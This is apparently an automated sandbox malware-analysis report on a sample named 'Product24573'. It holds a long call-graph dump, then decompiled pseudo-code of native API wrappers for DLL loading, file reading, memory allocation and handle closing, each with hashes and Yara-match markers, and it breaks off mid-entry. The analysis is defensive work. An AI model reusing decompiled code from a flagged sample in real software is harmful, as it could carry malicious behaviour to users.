LdrLoadDll 34352->34353 34354 41efe4 34353->34354 34355 41ee33 LdrLoadDll 34354->34355 34356 41eff0 34355->34356 34357 41ee33 LdrLoadDll 34356->34357 34358 41eff9 34357->34358 34359 41ee33 LdrLoadDll 34358->34359 34360 41f002 34359->34360 34361 41ee33 LdrLoadDll 34360->34361 34362 41f00b 34361->34362 34363 41ee33 LdrLoadDll 34362->34363 34364 41f014 34363->34364 34365 41ee33 LdrLoadDll 34364->34365 34366 41f01d 34365->34366 34367 41ee33 LdrLoadDll 34366->34367 34368 41f029 34367->34368 34369 41ee33 LdrLoadDll 34368->34369 34370 41f032 34369->34370 34371 41ee33 LdrLoadDll 34370->34371 34372 41f03b 34371->34372 34373 41ee33 LdrLoadDll 34372->34373 34374 41f044 34373->34374 34375 41ee33 LdrLoadDll 34374->34375 34376 41f04d 34375->34376 34377 41ee33 LdrLoadDll 34376->34377 34378 41f056 34377->34378 34379 41ee33 LdrLoadDll 34378->34379 34380 41f062 34379->34380 34381 41ee33 LdrLoadDll 34380->34381 34382 41f06b 34381->34382 34383 41ee33 LdrLoadDll 34382->34383 34384 41f074 34383->34384 34385 41ee33 LdrLoadDll 34384->34385 34386 41f07d 34385->34386 34387 41ee33 LdrLoadDll 34386->34387 34388 41f086 34387->34388 34389 41ee33 LdrLoadDll 34388->34389 34390 41f08f 34389->34390 34391 41ee33 LdrLoadDll 34390->34391 34392 41f09b 34391->34392 34393 41ee33 LdrLoadDll 34392->34393 34394 41f0a4 34393->34394 34395 41ee33 LdrLoadDll 34394->34395 34396 41f0ad 34395->34396 34397 41ee33 LdrLoadDll 34396->34397 34398 41f0b6 34397->34398 34399 41ee33 LdrLoadDll 34398->34399 34400 41f0bf 34399->34400 34401 41ee33 LdrLoadDll 34400->34401 34402 41f0c8 34401->34402 34403 41ee33 LdrLoadDll 34402->34403 34404 41f0d4 34403->34404 34405 41ee33 LdrLoadDll 34404->34405 34406 41f0dd 34405->34406 34407 41ee33 LdrLoadDll 34406->34407 34408 41f0e6 34407->34408 34409 41ee33 LdrLoadDll 34408->34409 34410 41f0ef 34409->34410 34411 41ee33 LdrLoadDll 34410->34411 34412 41f0f8 34411->34412 34413 41ee33 LdrLoadDll 34412->34413 34414 41f101 34413->34414 34415 41ee33 LdrLoadDll 34414->34415 34416 41f10d 34415->34416 34417 41ee33 LdrLoadDll 34416->34417 34418 41f116 34417->34418 34419 41ee33 LdrLoadDll 34418->34419 34420 41f11f 34419->34420 34420->34201 34422 41f1b3 LdrLoadDll 34421->34422 34423 41e0df 34422->34423 34453 1139860 LdrInitializeThunk 34423->34453 34424 41e0f6 34424->34203 34426->34198 34428 41f1b3 LdrLoadDll 34427->34428 34429 41e75f NtAllocateVirtualMemory 34428->34429 34429->34297 34431 421273 34430->34431 34432 421279 34430->34432 34431->34303 34433 4201c3 2 API calls 34432->34433 34434 42129f 34433->34434 34434->34303 34436 421303 34435->34436 34437 421360 34436->34437 34438 4201c3 2 API calls 34436->34438 34437->34311 34439 42133d 34438->34439 34440 4200e3 2 API calls 34439->34440 34440->34437 34441->34308 34442->34321 34443->34323 34444->34325 34445->34328 34446->34330 34448 41ee4e 34447->34448 34449 4195b3 LdrLoadDll 34448->34449 34450 41ee6e 34449->34450 34451 4195b3 LdrLoadDll 34450->34451 34452 41ef22 34450->34452 34451->34452 34452->34346 34452->34452 34453->34424 34455 113968f LdrInitializeThunk 34454->34455 34456 1139681 34454->34456 34455->34207 34456->34207 34458 41e88f RtlFreeHeap 34457->34458 34459 41f1b3 LdrLoadDll 34457->34459 34458->34210 34459->34458 34461 409433 34460->34461 34462 40942e 34460->34462 34463 420063 2 API calls 34461->34463 34462->34142 34466 409458 34463->34466 34464 4094bb 34464->34142 34465 41e0c3 2 API calls 34465->34466 34466->34464 34466->34465 34467 4094c1 34466->34467 34471 420063 2 API calls 34466->34471 34476 41e7c3 34466->34476 34469 4094e7 34467->34469 34470 41e7c3 2 API calls 34467->34470 34469->34142 34472 4094d8 34470->34472 34471->34466 34472->34142 34474 409701 34473->34474 34475 41e7c3 2 API calls 34473->34475 34474->34103 34475->34474 34477 41f1b3 LdrLoadDll 34476->34477 34478 41e7df 34477->34478 34481 11396e0 LdrInitializeThunk 34478->34481 34479 41e7f6 34479->34466 34481->34479 34483 41f846 34482->34483 34484 40cf03 LdrLoadDll 34483->34484 34485 40bdb4 34484->34485 34485->34111 34488 40d276 34486->34488 34487 40d2f0 34487->34116 34488->34487 34499 41de93 LdrLoadDll 34488->34499 34491 41e9f2 LookupPrivilegeValueW 34490->34491 34492 41f1b3 LdrLoadDll 34490->34492 34491->34120 34492->34491 34494 41e471 34493->34494 34495 41f1b3 LdrLoadDll 34494->34495 34496 41e47f 34495->34496 34500 1139910 LdrInitializeThunk 34496->34500 34497 41e49e 34497->34121 34499->34487 34500->34497 34502 40d3fa 34501->34502 34503 40d253 LdrLoadDll 34502->34503 34504 40d45d 34503->34504 34504->34073 34506 40ff6d 34505->34506 34514 410023 34505->34514 34507 40d253 LdrLoadDll 34506->34507 34508 40ff8f 34507->34508 34515 41e143 34508->34515 34510 40ffd1 34518 41e183 34510->34518 34513 41e693 2 API calls 34513->34514 34514->34076 34514->34077 34516 41e15f 34515->34516 34517 41f1b3 LdrLoadDll 34515->34517 34516->34510 34517->34516 34519 41f1b3 LdrLoadDll 34518->34519 34520 41e19f 34519->34520 34523 1139fe0 LdrInitializeThunk 34520->34523 34521 410017 34521->34513 34523->34521 34525 40dd8e 34524->34525 34526 40d3d3 LdrLoadDll 34525->34526 34527 40dde5 34526->34527 34560 40d053 34527->34560 34529 40de0b 34559 40e05c 34529->34559 34569 418ad3 34529->34569 34531 40de50 34531->34559 34572 40a053 34531->34572 34533 40de94 34533->34559 34594 41e703 34533->34594 34537 40deea 34538 40def1 34537->34538 34607 41e213 34537->34607 34539 4200e3 2 API calls 34538->34539 34542 40defe 34539->34542 34542->34090 34543 40df3b 34544 4200e3 2 API calls 34543->34544 34545 40df42 34544->34545 34545->34090 34546 40df4b 34547 410113 3 API calls 34546->34547 34548 40dfbf 34547->34548 34548->34538 34549 40dfca 34548->34549 34550 4200e3 2 API calls 34549->34550 34551 40dfee 34550->34551 34612 41e263 34551->34612 34554 41e213 2 API calls 34555 40e029 34554->34555 34555->34559 34617 41e023 34555->34617 34558 41e8b3 2 API calls 34558->34559 34559->34090 34561 40d060 34560->34561 34562 40d064 34560->34562 34561->34529 34563 40d07d 34562->34563 34564 40d0af 34562->34564 34622 41ded3 LdrLoadDll 34563->34622 34623 41ded3 LdrLoadDll 34564->34623 34566 40d0c0 34566->34529 34568 40d09f 34568->34529 34570 410113 3 API calls 34569->34570 34571 418af9 34569->34571 34570->34571 34571->34531 34624 40a283 34572->34624 34574 40a279 34574->34533 34575 40a071 34575->34574 34576 409423 4 API calls 34575->34576 34577 40a14f 34575->34577 34587 40a0af 34576->34587 34577->34574 34578 40a22f 34577->34578 34579 409423 4 API calls 34577->34579 34578->34574 34673 410383 10 API calls 34578->34673 34591 40a18c 34579->34591 34581 40a243 34581->34574 34674 410383 10 API calls 34581->34674 34583 40a259 34583->34574 34675 410383 10 API calls 34583->34675 34585 40a26f 34585->34533 34587->34577 34588 40a145 34587->34588 34638 409d33 34587->34638 34590 4096e3 2 API calls 34588->34590 34589 409d33 14 API calls 34589->34591 34590->34577 34591->34578 34591->34589 34592 40a225 34591->34592 34593 4096e3 2 API calls 34592->34593 34593->34578 34595 41e719 34594->34595 34596 41f1b3 LdrLoadDll 34595->34596 34597 41e71f 34596->34597 34792 11398f0 LdrInitializeThunk 34597->34792 34598 40decb 34600 410113 34598->34600 34601 410130 34600->34601 34793 41e1c3 34601->34793 34604 410178 34604->34537 34605 41e213 2 API calls 34606 4101a1 34605->34606 34606->34537 34608 41f1b3 LdrLoadDll 34607->34608 34609 41e22f 34608->34609 34799 1139780 LdrInitializeThunk 34609->34799 34610 40df2e 34610->34543 34610->34546 34613 41f1b3 LdrLoadDll 34612->34613 34614 41e27f 34613->34614 34800 11397a0 LdrInitializeThunk 34614->34800 34615 40e002 34615->34554 34618 41f1b3 LdrLoadDll 34617->34618 34619 41e03f 34618->34619 34801 1139a20 LdrInitializeThunk 34619->34801 34620 40e055 34620->34558 34622->34568 34623->34566 34625 40a2aa 34624->34625 34626 409423 4 API calls 34625->34626 34633 40a50f 34625->34633 34627 40a2fd 34626->34627 34628 4096e3 2 API calls 34627->34628 34627->34633 34629 40a38c 34628->34629 34630 409423 4 API calls 34629->34630 34629->34633 34631 40a3a1 34630->34631 34632 4096e3 2 API calls 34631->34632 34631->34633 34636 40a401 34632->34636 34633->34575 34634 409423 4 API calls 34634->34636 34635 409d33 14 API calls 34635->34636 34636->34633 34636->34634 34636->34635 34637 4096e3 2 API calls 34636->34637 34637->34636 34639 409d3e 34638->34639 34676 409d9f 34639->34676 34641 409d87 34707 41df13 34641->34707 34644 409dac 34644->34587 34645 409e2d 34740 410263 LdrLoadDll NtClose 34645->34740 34646 41e103 2 API calls 34647 409dd0 34646->34647 34647->34645 34649 409ddb 34647->34649 34651 409e59 34649->34651 34710 40e073 34649->34710 34650 409e48 34652 409e65 34650->34652 34653 409e4f 34650->34653 34651->34587 34741 41df93 LdrLoadDll 34652->34741 34655 41e693 2 API calls 34653->34655 34655->34651 34656 409df5 34656->34651 34730 409b63 34656->34730 34658 409e90 34660 40e073 5 API calls 34658->34660 34662 409eb0 34660->34662 34662->34651 34742 41dfc3 LdrLoadDll 34662->34742 34664 409ed5 34743 41e053 LdrLoadDll 34664->34743 34666 409eef 34667 41e023 2 API calls 34666->34667 34668 409efe 34667->34668 34669 41e693 2 API calls 34668->34669 34670 409f08 34669->34670 34744 409933 34670->34744 34672 409f1c 34672->34587 34673->34581 34674->34583 34675->34585 34677 409dac 34676->34677 34678 409db4 34676->34678 34677->34641 34679 409e2d 34678->34679 34680 41e103 2 API calls 34678->34680 34760 410263 LdrLoadDll NtClose 34679->34760 34681 409dd0 34680->34681 34681->34679 34683 409ddb 34681->34683 34685 409e59 34683->34685 34688 40e073 5 API calls 34683->34688 34684 409e48 34686 409e65 34684->34686 34687 409e4f 34684->34687 34685->34641 34761 41df93 LdrLoadDll 34686->34761 34689 41e693 2 API calls 34687->34689 34690 409df5 34688->34690 34689->34685 34690->34685 34693 409b63 12 API calls 34690->34693 34692 409e90 34694 40e073 5 API calls 34692->34694 34695 409e23 34693->34695 34696 409eb0 34694->34696 34695->34641 34696->34685 34762 41dfc3 LdrLoadDll 34696->34762 34698 409ed5 34763 41e053 LdrLoadDll 34698->34763 34700 409eef 34701 41e023 2 API calls 34700->34701 34702 409efe 34701->34702 34703 41e693 2 API calls 34702->34703 34704 409f08 34703->34704 34705 409933 11 API calls 34704->34705 34706 409f1c 34705->34706 34706->34641 34708 41f1b3 LdrLoadDll 34707->34708 34709 409da2 34707->34709 34708->34709 34709->34644 34709->34645 34709->34646 34712 40e0a1 34710->34712 34711 410113 3 API calls 34713 40e103 34711->34713 34712->34711 34714 40e14c 34713->34714 34715 41e213 2 API calls 34713->34715 34714->34656 34716 40e12e 34715->34716 34717 40e138 34716->34717 34721 40e158 34716->34721 34718 41e263 2 API calls 34717->34718 34719 40e142 34718->34719 34720 41e693 2 API calls 34719->34720 34720->34714 34722 40e1e2 34721->34722 34723 40e1c5 34721->34723 34725 41e263 2 API calls 34722->34725 34724 41e693 2 API calls 34723->34724 34726 40e1cf 34724->34726 34727 40e1f1 34725->34727 34726->34656 34728 41e693 2 API calls 34727->34728 34729 40e1fb 34728->34729 34729->34656 34732 409b79 34730->34732 34731 409d04 34731->34587 34732->34731 34764 409723 34732->34764 34734 409c78 34734->34731 34735 409933 11 API calls 34734->34735 34736 409ca6 34735->34736 34736->34731 34737 41e103 2 API calls 34736->34737 34738 409cdb 34737->34738 34738->34731 34739 41e703 2 API calls 34738->34739 34739->34731 34740->34650 34741->34658 34742->34664 34743->34666 34745 40995c 34744->34745 34771 409893 34745->34771 34748 41e703 2 API calls 34749 40996f 34748->34749 34749->34748 34750 4099fa 34749->34750 34753 4099f5 34749->34753 34779 4102e3 34749->34779 34750->34672 34751 41e693 2 API calls 34752 409a2d 34751->34752 34752->34750 34754 41df13 LdrLoadDll 34752->34754 34753->34751 34755 409a92 34754->34755 34755->34750 34783 41df53 34755->34783 34757 409af6 34757->34750 34758 4191a3 8 API calls 34757->34758 34759 409b4b 34758->34759 34759->34672 34760->34684 34761->34692 34762->34698 34763->34700 34765 409822 34764->34765 34766 409738 34764->34766 34765->34734 34766->34765 34767 4191a3 8 API calls 34766->34767 34769 4097a5 34767->34769 34768 4097cc 34768->34734 34769->34768 34770 4200e3 2 API calls 34769->34770 34770->34768 34772 4098ad 34771->34772 34773 40cf03 LdrLoadDll 34772->34773 34774 4098c8 34773->34774 34775 4195b3 LdrLoadDll 34774->34775 34776 4098e0 34775->34776 34777 4098fc 34776->34777 34778 4098e9 PostThreadMessageW 34776->34778 34777->34749 34778->34777 34780 4102f6 34779->34780 34786 41e093 34780->34786 34784 41f1b3 LdrLoadDll 34783->34784 34785 41df6f 34784->34785 34785->34757 34787 41e0af 34786->34787 34788 41f1b3 LdrLoadDll 34786->34788 34791 1139840 LdrInitializeThunk 34787->34791 34788->34787 34789 410321 34789->34749 34791->34789 34792->34598 34794 41f1b3 LdrLoadDll 34793->34794 34795 41e1df 34794->34795 34798 11399a0 LdrInitializeThunk 34795->34798 34796 410171 34796->34604 34796->34605 34798->34796 34799->34610 34800->34615 34801->34620

                                          Executed Functions

                                          Function 0040CF03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 407 40cf03-40cf1f 408 40cf27-40cf2c 407->408 409 40cf22 call 420e83 407->409 410 40cf32-40cf40 call 4213a3 408->410 411 40cf2e-40cf31 408->411 409->408 414 40cf50-40cf61 call 41f723 410->414 415 40cf42-40cf4d call 421623 410->415 420 40cf63-40cf77 LdrLoadDll 414->420 421 40cf7a-40cf7d 414->421 415->414 420->421
                                          C-Code - Quality: 100%
                                          			E0040CF03(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420E83( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E004213A3(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421623( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F723(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                          0x0040cf1f
                                          0x0040cf22
                                          0x0040cf27
                                          0x0040cf2c
                                          0x0040cf36
                                          0x0040cf3b
                                          0x0040cf3e
                                          0x0040cf40
                                          0x0040cf48
                                          0x0040cf4d
                                          0x0040cf4d
                                          0x0040cf54
                                          0x0040cf5c
                                          0x0040cf5f
                                          0x0040cf61
                                          0x0040cf75
                                          0x00000000
                                          0x0040cf77
                                          0x0040cf7d
                                          0x0040cf31
                                          0x0040cf31
                                          0x0040cf31

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF75
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 1f79ec65728361f6aacc61d0b8ee144499b1802415a85c76e63a64ecc08ce9c1
                                          • Instruction ID: 50010c7138d93e6f9ea6e265deb9c9d9996512de15ce5229bf2c89d0c65d76ae
                                          • Opcode Fuzzy Hash: 1f79ec65728361f6aacc61d0b8ee144499b1802415a85c76e63a64ecc08ce9c1
                                          • Instruction Fuzzy Hash: D20152B1E4010EB7DB10DBE1DC82FDEB3789B14308F0042A6F908A7281F634EB448B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E65D Relevance: 1.5, APIs: 1, Instructions: 46filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 422 41e65d-41e661 423 41e663-41e68c call 41f1b3 422->423 424 41e62c-41e65c NtReadFile 422->424
                                          APIs
                                          • NtReadFile.NTDLL(004194D3,004149A1,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A1,004194D3,00000002,00000000), ref: 0041E658
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 989a99728f5d3fd41f55dbeef6ea95967e5b171b9bc780f8826328b2e2f7ccf5
                                          • Instruction ID: 7f92864f45cf3ca67b45b990d53c327ffe0249674551ab4ccc4cabb80f823d68
                                          • Opcode Fuzzy Hash: 989a99728f5d3fd41f55dbeef6ea95967e5b171b9bc780f8826328b2e2f7ccf5
                                          • Instruction Fuzzy Hash: 58014B72204204BFCB14DF99DC85DD77BADEF8C350F108549FA5C8B201C634E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E563 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 428 41e563-41e5b4 call 41f1b3 NtCreateFile
                                          C-Code - Quality: 100%
                                          			E0041E563(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                          0x0041e572
                                          0x0041e57a
                                          0x0041e5b0
                                          0x0041e5b4

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5B0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                          • Instruction ID: 858a361c7fac73dd57bd9bb54302a998ea006c4b18dec6683183bae7ba4cde4d
                                          • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                          • Instruction Fuzzy Hash: D0F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158258BA0997241D630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E613 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 437 41e613-41e65c call 41f1b3 NtReadFile
                                          C-Code - Quality: 25%
                                          			E0041E613(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t14;
				signed int _t15;
				void* _t19;
				intOrPtr _t21;
				intOrPtr* _t27;

				_t14 = _a4;
				_t21 =  *((intOrPtr*)(_t14 + 0x14));
				_t3 = _t14 + 0xa74; // 0xa76
				_t27 = _t3;
				_t15 = E0041F1B3(_t21, _t14, _t27, _t21, 0, 0x2a);
				 *((intOrPtr*)(__ebx + 0x458b2c55)) =  *((intOrPtr*)(__ebx + 0x458b2c55)) + _t21;
				 *((intOrPtr*)(__ebx - 0x3b7cdbb3)) =  *((intOrPtr*)(__ebx - 0x3b7cdbb3)) - _t21;
				asm("adc al, 0x52");
				_t19 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _t21, _t15 |  *_t15); // executed
				return _t19;
			}








                                          0x0041e616
                                          0x0041e619
                                          0x0041e622
                                          0x0041e622
                                          0x0041e62a
                                          0x0041e62e
                                          0x0041e634
                                          0x0041e63a
                                          0x0041e658
                                          0x0041e65c

                                          APIs
                                          • NtReadFile.NTDLL(004194D3,004149A1,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A1,004194D3,00000002,00000000), ref: 0041E658
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                          • Instruction ID: 7e6d20b8ab43ac4c6dd8b0e9747e979c985991331e4e85b11870b547d3735a74
                                          • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                          • Instruction Fuzzy Hash: 27F0FFB2200208ABCB04DF89DC84EEB77ADAF8C754F018208BE0DA7241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E743 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 440 41e743-41e780 call 41f1b3 NtAllocateVirtualMemory
                                          C-Code - Quality: 100%
                                          			E0041E743(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                          0x0041e75a
                                          0x0041e77c
                                          0x0041e780

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E77C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                          • Instruction ID: 0a6495e8f7e44f4a31df3bacb5b33776950b50f0b2a852a5fc142efbc3aec1ab
                                          • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                          • Instruction Fuzzy Hash: B0F01EB2210208ABCB18DF89DC81EEB77ADAF88754F018119BE0897241C630F821CBF4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E68F Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E68F(void* __eax, void* __esi, intOrPtr _a4, void* _a8) {
				long _t15;

				_t12 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t12, _t12 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t15 = NtClose(_a8); // executed
				return _t15;
			}




                                          0x0041e696
                                          0x0041e6aa
                                          0x0041e6b8
                                          0x0041e6bc

                                          APIs
                                          • NtClose.NTDLL(004102C8,00000000,?,004102C8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6B8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 9fc0b77864bc79e118e7065a84f160bb50efa7f73b5c36ea076cc26817774705
                                          • Instruction ID: f9cd73a8d8550e9af34dccee213d7d49f29f51c87b206270a25c4ed3f04bde21
                                          • Opcode Fuzzy Hash: 9fc0b77864bc79e118e7065a84f160bb50efa7f73b5c36ea076cc26817774705
                                          • Instruction Fuzzy Hash: 4EE08C32A00314AFD710EF98CC46F973BA8DF48660F01845ABA189B242C670E9108BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E693 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041E693(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                          0x0041e6aa
                                          0x0041e6b8
                                          0x0041e6bc

                                          APIs
                                          • NtClose.NTDLL(004102C8,00000000,?,004102C8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6B8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_Product24573.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                          • Instruction ID: 42318626d70f5b73991a76424c016a3848acfe8a2a5351ee0a56f11cd2c8e816
                                          • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                          • Instruction Fuzzy Hash: 8FD01772604214BBD610EBA9DC89FD77BACDF48664F018469BA1C5B242C570FA108AE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 786a3b34f1668c44fdd364189bc099ca25717ce3d8ad8ee932ed19144f91c26a
                                          • Instruction ID: 4d665e2304d91badcd45f2ea80d6172b5ca1dab6bb73c9e090cb28fb4bd4252a
                                          • Opcode Fuzzy Hash: 786a3b34f1668c44fdd364189bc099ca25717ce3d8ad8ee932ed19144f91c26a
                                          • Instruction Fuzzy Hash: 709002B130100403D944719955047460005A7E0751F51C015A5055594EC7998DD576A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011399A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ec66efc66185ac3da19d13f1a9eb1ca671f62242fb9f79707cf08bd4fa5476c8
                                          • Instruction ID: b1644171eee2841826f2574939f0c13644095579088cc68fca1d9335e15b6c2a
                                          • Opcode Fuzzy Hash: ec66efc66185ac3da19d13f1a9eb1ca671f62242fb9f79707cf08bd4fa5476c8
                                          • Instruction Fuzzy Hash: A89002B134100443D90461995514B060005E7F1751F51C019E1055594DC759CC52716A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
